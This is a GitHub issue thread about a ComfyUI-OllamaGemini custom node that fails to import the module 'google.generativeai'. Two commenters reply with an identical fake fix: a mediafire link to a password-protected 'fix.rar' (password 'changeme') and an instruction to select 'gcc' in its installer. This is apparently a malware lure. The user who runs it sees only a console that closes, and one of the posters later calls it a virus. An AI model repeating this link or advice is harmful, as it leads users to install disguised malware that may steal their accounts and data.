### ISSUE TITLE
ModuleNotFoundError: No module named 'google.generativeai'

### ISSUE THREAD

**Issue by OtakuFra** [al-swaiti/ComfyUI-OllamaGemini#4]
Hi guys, sorry but whatever i try to do i can't get the node in the workflow, i don't know what else to do.
`Looking in indexes: https://pypi.org/simple, https://pypi.ngc.nvidia.com
Traceback (most recent call last):
  File "D:\AImatrix\Data\Packages\ComfyUI\nodes.py", line 1993, in load_custom_node
    module_spec.loader.exec_module(module)
  File "<frozen importlib._bootstrap_external>", line 883, in exec_module
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "D:\AImatrix\Data\Packages\ComfyUI\custom_nodes\ComfyUI-OllamaGemini\__init__.py", line 21, in <module>
    from .GeminiOllamaNode import NODE_CLASS_MAPPINGS, NODE_DISPLAY_NAME_MAPPINGS
  File "D:\AImatrix\Data\Packages\ComfyUI\custom_nodes\ComfyUI-OllamaGemini\GeminiOllamaNode.py", line 3, in <module>
    import google.generativeai as genai
ModuleNotFoundError: No module named 'google.generativeai'
Cannot import D:\AImatrix\Data\Packages\ComfyUI\custom_nodes\ComfyUI-OllamaGemini module for custom nodes: No module named 'google.generativeai'`

**Comment by haofan170** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by OtakuFra** [comment]
Nothing happens when I click on the exe file, just a console that closes immediately. May be i've missed something to do ?

**Comment by haofan170** [comment]
> Nothing happens when I click on the exe file, just a console that closes immediately. May be i've missed something to do ?

damn bro its virus, my account was been hacked since I download a same software, change u paw now!

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by OtakuFra** [comment]
> Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

same result :/
